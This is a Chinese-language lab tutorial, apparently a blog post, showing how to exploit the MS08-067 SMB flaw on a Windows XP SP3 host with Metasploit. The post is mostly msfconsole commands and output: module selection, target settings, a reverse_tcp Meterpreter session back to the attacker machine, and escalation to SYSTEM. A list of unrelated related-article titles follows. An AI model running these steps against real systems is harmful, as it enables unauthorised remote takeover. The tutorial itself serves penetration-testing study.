本文简单介绍了如何使用metasploit针对ms08_067进行渗透测试,仅供学习

测试环境 描述 ip
主机 kali2020 192.168.1.113
目标主机 win xp sp3 192.168.1.108

①启动msf,搜索ms08_067

msf6 > search ms08_067Matching Modules
================#  Name                                 Disclosure Date  Rank   Check  Description-  ----                                 ---------------  ----   -----  -----------0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack CorruptionInteract with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
msf6 >

②使用ms08_067,设置参数,这里的target我设置为34,其他版本的可以使用show targets查看

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > optionsModule options (exploit/windows/smb/ms08_067_netapi):Name     Current Setting  Required  Description----     ---------------  --------  -----------RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'RPORT    445              yes       The SMB service port (TCP)SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)Payload options (windows/meterpreter/reverse_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)LHOST     192.168.1.113    yes       The listen address (an interface may be specified)LPORT     4444             yes       The listen portExploit target:Id  Name--  ----0   Automatic Targetingmsf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.108
rhost => 192.168.1.108
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34

③进行攻击,获取meterpreter权限并进行提权

msf6 exploit(windows/smb/ms08_067_netapi) > exploit[*] Started reverse TCP handler on 192.168.1.113:4444
[*] 192.168.1.108:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.108
[*] Meterpreter session 2 opened (192.168.1.113:4444 -> 192.168.1.108:2354) at 2021-05-20 08:55:20 +0800meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >

ms08_067漏洞渗透步骤——MSF相关推荐

  1. 内网渗透之MSF框架模块详细作用介绍

    目录 Metasploit Framework MSF主机存活探测类 MSF主机端口扫描类 MSF主机服务探测类 MSF主机反弹shell类 MSF主机服务爆破类 MSF攻击模块利用类 MSF数据库提 ...

  2. 20145335郝昊《网络攻防》Exp5 MS08_067漏洞测试

    20145335郝昊<网络攻防>Exp5 MS08_067漏洞测试 实验内容 了解掌握metasploit平台的一些基本操作,能学会利用已知信息完成简单的渗透操作. 漏洞MS08_067: ...

  3. Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)

    文章目录 一.漏洞详情 二.靶机搭建 kali Windows XP SP2 (Simplified Chinese ) 三.利用nmap对靶机扫描 四.漏洞利用 五.总结 一.漏洞详情 MS08-0 ...

  4. 利用CMS漏洞渗透并获取某服务器权限

    利用CMS漏洞渗透并获取某服务器权限 在phpmyadmin漏洞与利用专题中,我们从多个角度介绍了如何获取webshell并获取服务器权限的案例和情形,但在实际渗透过程中还有一种情况,即服务器上存在p ...

  5. Kali Linux 基于FreeFloat FTP Server编写漏洞渗透模块(下)

    目录 说明 Immunity Debugger+Mona 找到JMP ESP指令 漏洞渗透程序 在Immunity Debugger查看发送的字符 编写执行的程序 确定坏字符 Metasploit生成 ...

  6. WEB漏洞渗透测试靶场整理资源

    WEB漏洞渗透测试靶场整理资源 在所有人目光之外,一个人无声的坍塌下去,像是被什么火烧尽了,只余下灰烬 整理了一些WEB漏洞本地靶场资源,包括针对性的漏洞专题如SQL注入,XSS等-以及合集类的如DV ...

  7. 经典的ms08_067 漏洞利用

    ms08_067漏洞是smb服务的漏洞,而smb 服务是做什么的,很简单,他的一个经典使用方式就是共享文档(当然,这是windows里的服务内容),所以为了重现这个漏洞并让我们对其进行攻击,并取得控制 ...

  8. 为什么APP需要做漏洞渗透测试服务?

    为什么APP需要做漏洞渗透测试服务?现实生活中小企业面对的网络安全风险多种多样.而真正的隐患,是公司觉得自己自身非常安全,却不知道隐患早就渗透到里面.随着安全产业的发展和技术人员安全防范意识的提升,以 ...

  9. 永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令

    环境部署 靶机:win7(172.168.100.158) 工具机:kali,nessus 攻击步骤 1.nessus扫描靶机 2.根据扫描结果查看靶机漏洞 3.发现靶机存在永恒之蓝(MS17-010 ...

最新文章

  1. SAP QM 使用QP01事务代码真的不能创建含有Multiple Specification的检验计划
  2. CaseStudy(showcase)界面篇-导出xaml以及放入Blend的技巧
  3. as cast float server sql_Sql Server中Float格式转换字符串varchar方法(转)
  4. LeetCode:204. 计数质数
  5. android编辑框最大字数,TextView 限制最大行数、最小行数、字数超过“...”表示...
  6. 前序表达式 中序表达式 后序表达式
  7. C++ 枚举类型的思考
  8. Android ListView 下拉刷新 上拉更多[实例]
  9. 熊出没之奇幻空间里面的机器人图片_武汉欢乐谷奇幻灯光节12月24日盛大开幕...
  10. Axure汉化下载步骤
  11. OPPO K9 Pro刷root强解锁BL刷面具Magisk框架 oppo k9pro root教程
  12. Linux安装JDK步骤
  13. 铁威马教程之如何轻松同步TNAS和云盘数据
  14. fms5序列号_火枫 FMS-105分体式炉头测评
  15. AUTOSAR CDD 模块解析 --- 设计建议
  16. asf格式如何转换为mp4?
  17. 石子合并问题(no circle)
  18. 区块链1——区块链基础
  19. adress标签的使用
  20. vue父子组件之间的传值,及互相调用父子组件之间的方法

热门文章

  1. 等高布局、圣杯布局、双飞翼布局的实现原理
  2. wsl Error: 0x80070003
  3. 深度 | 保险科技:人工智能等新技术在保险业的应用与展望
  4. window10+Anaconda下tensorflow-gpu1.8+GUDA9+cuDNN7的完整安装流程
  5. 【算法导论】python实现算法导论中的算法(传送门)
  6. Don’t Be Cute with Your Test Data
  7. corona sdk android,在Corona SDK中为Android添加标记
  8. Elasticsearch 跨网络、跨集群同步选型指南
  9. 2021-12-8数字通信的过程
  10. Linux下的 c 多线程与线程同步(二)